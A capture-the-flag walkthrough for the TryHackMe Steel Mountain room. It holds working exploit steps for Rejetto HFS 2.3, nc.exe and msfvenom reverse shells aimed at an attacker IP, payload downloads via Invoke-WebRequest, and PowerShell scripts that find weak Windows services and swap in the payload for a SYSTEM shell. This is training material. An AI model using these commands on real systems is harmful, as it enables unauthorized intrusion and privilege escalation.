TryHackMe — Steel Mountain w/o MSF

Use PowerShell and winPEAS to enumerate the system and collect the information needed to escalate privileges.


Machine Information:


[1]NMAP Scan

sudo nmap -A -T4 -p- 10.10.255.1 -oN nmap_scan

-T needs a timing template number (-T4 here); -A enables OS and version detection, which is what identifies the Rejetto HFS 2.3 instance on port 8080.


[2]Research vulnerability

searchsploit hfs 2.3
searchsploit -x 39161

-x examines the exploit by its EDB-ID; 39161 is the HFS 2.3.x remote command execution script in Python.


[3]Edit exploit

Copy 39161.py to a working file (exploit.py) and change the two variables at the top of the script: ip_addr is the attacker's IP (10.11.17.48) and local_port is the port the netcat listener in step 5 will use (4444). The script makes the target fetch nc.exe from http://<ip_addr>/nc.exe and run it with -e cmd.exe back to that listener, so the web server in step 4 has to serve nc.exe on port 80.


[4]Setup HTTP server to serve nc.exe and winPEAS

Run this from the directory that holds nc.exe and winPEAS.exe. Port 80 is what the edited exploit expects, and binding to it needs root. This is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 80.

sudo python -m SimpleHTTPServer 80


[5]Setup a netcat listener then run exploit

nc -lvnp 4444

python exploit.py 10.10.255.1 8080

The arguments are the target IP and the HFS port (8080). If the listener gets no connection, run the exploit a second time: the first run often only gets nc.exe onto the target, and the second run executes it.


[6]Download winPEAS for Privilege Escalation

Run this from a directory the current user can write to; -OutFile is relative to the shell's current directory.

powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://10.11.17.48/winPEAS.exe"


[7]Run winPEAS

winPEAS.exe

The output is long; winPEAS.exe servicesinfo limits it to the service checks. The finding used in the next steps is the AdvancedSystemCareService9 service: its binary path is unquoted and contains spaces, the directory holding the binary is writable by the current user, and the service runs with SYSTEM privileges, which is what a swapped binary inherits.

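As an added example (not code from the original walkthrough or from winPEAS), the following PowerShell reproduces by hand the checks behind that finding: services whose binary path is unquoted and contains spaces, and services whose binary or binary directory the current user can write to. It runs from the low-privileged shell obtained in step 5 and needs no admin rights; the function names are my own.

```powershell
# Added example, not code from the original walkthrough or from winPEAS.
# It reproduces by hand the checks behind the finding used in steps 8 to 10:
# a service whose binary path is unquoted and contains spaces, and/or whose
# binary or binary directory the current user can write to. Run it from the
# low-privileged shell obtained in step 5; it needs no admin rights.
# Function names are my own.

$id = [Security.Principal.WindowsIdentity]::GetCurrent()
# SIDs of the current user and every group in its token (Everyone, Users, ...)
$script:MySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # PathName may carry arguments: a quoted path ends at the closing quote,
    # an unquoted one is taken up to the first ".exe".
    if ($PathName -match '^"([^"]+)"')   { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName
}

function Test-Writable {
    param([string]$Path)
    # ACL-based check. A write probe would be wrong here: the binary of a
    # running service cannot be opened for writing (sharing violation) even
    # when its ACL grants it. Deny ACEs and generic rights are ignored, which
    # is acceptable for triage; confirm by hand before relying on a hit.
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $writeData = [int][Security.AccessControl.FileSystemRights]::WriteData
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        try { $sid = $rule.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($script:MySids -notcontains $sid) { continue }
        # WriteData is the bit shared by Write, Modify and FullControl.
        if (([int]$rule.FileSystemRights -band $writeData) -ne 0) { return $true }
    }
    return $false
}

function Find-WeakServices {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $bin = Get-ServiceBinaryPath $svc.PathName
        $dir = Split-Path -Path $bin -Parent
        $unquoted    = ($svc.PathName -notmatch '^"') -and ($bin -match ' ')
        $binWritable = Test-Writable $bin
        $dirWritable = Test-Writable $dir
        if ($unquoted -or $binWritable -or $dirWritable) {
            # StartName tells you what a swapped binary would run as.
            [pscustomobject]@{
                Service        = $svc.Name
                RunsAs         = $svc.StartName
                StartMode      = $svc.StartMode
                BinaryPath     = $bin
                UnquotedPath   = $unquoted
                BinaryWritable = $binWritable
                DirWritable    = $dirWritable
            }
        }
    }
}

Find-WeakServices | Format-Table -AutoSize
```

A hit is only useful if you can also stop and start the service (the sc stop in step 9 shows the current user can for AdvancedSystemCareService9); sc sdshow <service> prints the service's security descriptor if you need to check that first. Rows with RunsAs of LocalSystem and BinaryWritable or DirWritable set are the ones worth the msfvenom route in step 8.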

[8]Create msfvenom payload and setup a netcat listener

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.48 LPORT=1234 -f exe -o ASCService.exe

nc -lvnp 1234

The payload is named after the service binary it will replace and is served from the same web server as in step 4. A plain -f exe never reports to the Service Control Manager, so the service start in step 10 times out and the SCM may terminate the process; if the shell dies, rebuild with -f exe-service, which wraps the payload in a binary that answers the SCM.


[9]Stop service

sc stop AdvancedSystemCareService9

The service has to be stopped first: the binary of a running service cannot be overwritten. This is typed in the cmd.exe shell from step 5; in PowerShell, sc is an alias for Set-Content, so use sc.exe there.


[10]Download payload into the directory of the target service then start service

Change into the directory that winPEAS reported for the service binary before downloading, because -OutFile is relative to the shell's current directory; the download then replaces the service's own ASCService.exe. Starting the service runs the payload as SYSTEM, and the listener from step 8 receives the shell.

powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.11.17.48/ASCService.exe"

sc start AdvancedSystemCareService9

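Steps 8 to 10 as one PowerShell routine, as an added example that is not part of the original walkthrough. It adds what the raw commands leave out: the original service binary is backed up so the service can be put back, the backup doubles as a write-access check before the service is stopped, and the payload is written to the service's real binary path rather than to whatever the current directory is. The service name and listener address are the walkthrough's; the payload URL path is an assumption (it must match the file served in step 8) and the function names are my own.

```powershell
# Added example, not code from the original walkthrough. It performs steps 8 to 10
# as one routine: back up the service binary, stop the service, download the
# payload onto the binary's real path, start the service, and provide a restore.
# Service name and listener address are the walkthrough's; the payload URL path
# is an assumption and the function names are my own.

function Get-ServiceInfo {
    param([string]$ServiceName)
    $svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
    if (-not $svc) { throw "service '$ServiceName' not found" }
    # AdvancedSystemCareService9's PathName is a bare path with no arguments;
    # Trim('"') keeps this working if the path were quoted.
    [pscustomobject]@{ Binary = $svc.PathName.Trim('"'); RunsAs = $svc.StartName }
}

function Invoke-ServiceBinarySwap {
    param(
        [Parameter(Mandatory)][string]$ServiceName,
        [Parameter(Mandatory)][string]$PayloadUrl
    )
    $info   = Get-ServiceInfo $ServiceName
    $bin    = $info.Binary
    $backup = "$bin.bak"

    # Copy the original first. This both keeps it for Restore-ServiceBinary and
    # proves the directory is writable before anything is stopped or changed.
    if (-not (Test-Path -LiteralPath $backup)) {
        Copy-Item -LiteralPath $bin -Destination $backup -ErrorAction Stop
    }

    # The binary of a running service cannot be overwritten, so stop it now.
    Stop-Service -Name $ServiceName -Force -ErrorAction Stop

    # Absolute -OutFile: the download lands on the binary path regardless of cwd.
    Invoke-WebRequest -Uri $PayloadUrl -OutFile $bin -UseBasicParsing -ErrorAction Stop

    # A plain reverse-shell exe never reports to the Service Control Manager, so
    # Start-Service fails with error 1053 after about 30 seconds even though the
    # payload ran and the listener from step 8 already has its shell.
    Start-Service -Name $ServiceName -ErrorAction SilentlyContinue
    "payload launched as $($info.RunsAs); original kept at $backup"
}

function Restore-ServiceBinary {
    param([Parameter(Mandatory)][string]$ServiceName)
    $bin = (Get-ServiceInfo $ServiceName).Binary
    Stop-Service -Name $ServiceName -Force -ErrorAction SilentlyContinue
    Move-Item -LiteralPath "$bin.bak" -Destination $bin -Force
    Start-Service -Name $ServiceName
}

# With the walkthrough's listener (nc -lvnp 1234) already running on 10.11.17.48:
Invoke-ServiceBinarySwap -ServiceName 'AdvancedSystemCareService9' `
                         -PayloadUrl 'http://10.11.17.48/ASCService.exe'
```

Run it in a PowerShell session on the target (powershell.exe from the cmd.exe shell of step 5). If the payload was built with -f exe-service instead of -f exe, Start-Service returns cleanly and the shell is not at risk of being killed when the start times out; Restore-ServiceBinary puts the original binary back once you are done.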

References:

https://tryhackme.com/room/steelmountain

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Written by

Experienced Network Security Engineer with a demonstrated history of working in the field of IT security industry.
